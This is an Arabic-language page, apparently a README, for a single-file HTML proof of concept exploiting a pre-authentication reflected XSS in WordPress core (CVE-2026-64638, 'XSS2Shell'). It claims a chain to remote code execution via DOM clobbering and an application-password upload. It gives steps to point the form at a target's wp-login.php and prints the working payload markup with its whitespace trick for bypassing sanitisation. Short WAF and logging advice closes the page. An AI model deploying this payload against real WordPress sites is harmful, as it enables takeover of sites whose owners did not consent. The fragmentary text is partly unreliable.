
إثبات مفهوم من ملف HTML واحد لثغرة XSS منعكسة قبل المصادقة في WordPress (CVE-2026-64638)، يعرض تنفيذ JavaScript غير مصادَق عليه وسلسلة تحويل من XSS إلى RCE عبر DOM clobbering ورفع كلمة مرور التطبيق.
إثبات مفهوم XSS انعكاسية قبل المصادقة في WordPress
إثبات مفهوم بملف HTML واحد لثغرة CVE-2026-64638 (XSS2Shell)، وهي ثغرة XSS تعتمد على الفروقات بين المحلِّلات في نواة WordPress. تُظهر تنفيذ JavaScript غير مصادق عليه في أصل WordPress عبر طلب تسجيل دخول مُصمَّم خصيصًا.
strip_tags() مقابل wp_kses_post())POC.html في محرر نصوص.http://TARGET/wp-login.php في خاصية action الخاصة بالنموذج بهدفك.<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm() (أو alert()) في أصل WordPress.< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
المسافة بعد كل < هي جوهر الاستغلال. بدونها، يزيل wp_strip_all_tags() كل شيء.
%3C + مسافة بيضاء في الحقل log على مستوى WAF/الحافة.POST /wp-login.php التي يحتوي فيها log على < مُرمَّز.